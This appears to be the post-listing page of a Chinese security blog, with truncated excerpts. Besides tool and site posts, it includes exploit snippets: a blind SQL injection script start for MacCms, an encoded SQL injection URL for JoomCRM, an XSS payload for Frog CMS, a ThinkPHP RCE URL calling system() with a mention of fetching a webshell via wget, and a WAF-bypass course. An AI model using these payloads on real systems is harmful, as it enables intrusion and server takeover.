• 博客更换域名为hedysx.com

    博客更换域名为hedysx.com
    unhonker.com这个域名已经使用了大概7年的时间,关于更换新域名(hedysx.com)的事情考虑了1个多月才决定也算是代表一个新的开始吧。
    作者:hedysx| 发布:2018年12月28日 | 分类:个人关注 | 阅读:83次|
  • Burp Suite 2.0测试版

    Burp Suite 2.0测试版
    更新历史 Burp Suite 2.0 beta现在可供专业版用户使用。 本次更次包含多项重大改动并添加了诸多全新功能具有许多新功能,包括: 1. 全新的爬虫工具,能够自动处理会话、检测应用程序状态的变化、抓取多次登录信息和不稳定的内容。 2. 全新的扫描引擎, 支持自动会话处理、多层次扫描、增强的存储输入检测、聚合整个网站的被动问题、有效处理频繁出现的配置插入点以及流畅地...
    作者:hedysx| 发布:2018年8月26日 | 分类:小工具 | 阅读:835次| 标签:
  • MacCms(苹果cms)注入漏洞较新的文章

    MacCms(苹果cms)注入漏洞
    文章是转载一位表哥,全程分析在这里 maccms8_mfb(苹果CMS视频分享程序 8.0 | 2017.09.27 发布的版本 Poc #! /usr/bin/python # -*- coding:utf-8 -*- #author:F0rmat import requests import time dict = "1234567890qwertyuiopasdfghjklzxcvbnm_{}QWERTYUIOPASDFGHJKLZXCVBNM,@.?" UserName='' UserPass='' UserName_length=0 url='http://sb.com/' url = url ...
    作者:hedysx| 发布:2019年1月17日 | 分类:个人关注 | 阅读:12次| 标签:
  • Joomla JoomCRM 1.1.1注入漏洞

    Joomla JoomCRM 1.1.1注入漏洞
    # POC: # http://localhost/[PATH]/index.php?option=com_joomcrm&view=contacts&format=raw&loc=deal&tmpl=component&deal_id=[SQL] # GET /[PATH]/index.php?option=com_joomcrm&view=contacts&format=raw&loc=deal&tmpl=component&deal_id=31%39%20A%4e%44%28%53%45%4c%45%43%54%20%...
    作者:hedysx| 发布:2019年1月13日 | 分类:漏洞公布 | 阅读:26次| 标签:
  • Frog CMS 0.9.5跨站漏洞

    Frog CMS 0.9.5跨站漏洞
    # Version:0.9.5 # CVE :CVE-2018-20448 # The parameter under /install/index.php is that the Database name has reflective XSS # 1 The Database name , username and password must be correct # 2 You can use the exp: <script>alert(1)</script>
    作者:hedysx| 发布:2019年1月03日 | 分类:漏洞公布 | 阅读:51次| 标签:
  • QQ消息防撤回以及勋章墙补丁patch

    QQ消息防撤回以及勋章墙补丁patch
    软件转载自吾爱破解。 测试了一下,9.0.8版本是可以用,腾讯TIM暂时没测试。 百度网盘下载地址: https://pan.baidu.com/s/1hT2QTcbyIubK48eIOy6oyA 提取码:fetm 解压密码:unhonker.com
    作者:hedysx| 发布:2018年12月17日 | 分类:小工具 | 阅读:141次| 标签:
  • thinkphp v5.x 远程代码执行漏洞poc

    thinkphp v5.x 远程代码执行漏洞poc
    20181216补充: 1.执行phpinfo http://unhonker.com/public/index.php?s=/index/\think\app/invokefunction&amp;amp;amp;amp;function=call_user_func_array&amp;amp;amp;amp;vars[0]=system&amp;amp;amp;amp;vars[1][]=php%20-r%20'phpinfo();' 2. 利用该漏洞远程执行下载命令,通过wget远程下载一个webshell后门,执行命令从而获得服务器权限。 其攻击URI详情...
    作者:hedysx| 发布:2018年12月15日 | 分类:漏洞公布 | 阅读:181次| 标签:
  • wordpress优化日志

    wordpress优化日志
    从本博客建立以来都没怎么搞过所谓的优化,一直都是裸着跑没加任何优化,但是!!!今年10月份搬家到浪潮云之后就发现有点不正常了。 博客使用的云服务器配置为2核cpu(E5)2G内存+50G SSD硬盘+5M宽带搭配前端腾讯云CDN+HTTP2; 环境为:centos6.5+php5.6+mysql5.6+tengine2.2.3; 整体来说配置不算低,但是在使用一个月期间内发现问题多多; 1.运行2天后内存占用高达95%...
    作者:hedysx| 发布:2018年12月01日 | 分类:技术文章 | 阅读:159次| 标签:,
  • phpMyAdmin 4.8.1本地文件包含漏洞

    phpMyAdmin 4.8.1本地文件包含漏洞
    CVE-2018-12613 # 1. Description: # An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be ...
    作者:hedysx| 发布:2018年11月27日 | 分类:漏洞公布 | 阅读:180次| 标签:
  • IE11 Null Pointer Difference

    IE11 Null Pointer Difference
    # Date: 2018-11-03 # Vendor: Microsoft Corporation # Product web page: https://www.microsoft.com # Affected version: 11.345.17134.0 (Update Versions: 11.0.90 (KB4462949)) # 11.1387.15063.0 (Update Versions: 11.0.90 (KB4462949)) # 11.0.9600.18282 (Update Versions: 11.0.30 (KB3148198)) # ...
    作者:hedysx| 发布:2018年11月07日 | 分类:漏洞公布 | 阅读:249次| 标签:
  • 实战研究绕过安全狗全过程(时长5小时)

    实战研究绕过安全狗全过程(时长5小时)
    文章转载自90sec 过程:从写漏洞代码 到搭建安全狗 再到 研究安全狗绕过方式 再到用菜刀连接安全狗 1.讲师操作:联合注入绕过安全狗4.0 一条龙 从注入到getshell(成功) 2.讲师操作:联合注入绕过安全狗3.5 (失败) 3.学员操作:安全狗3.5直接getshell(成功) 视频总时长:5小时 日期:2018年9月13号 ——–2.联合注入绕过安全狗4.0一条龙(成功).mp4 —...
    作者:hedysx| 发布:2018年9月21日 | 分类:技术文章 | 阅读:462次| 标签: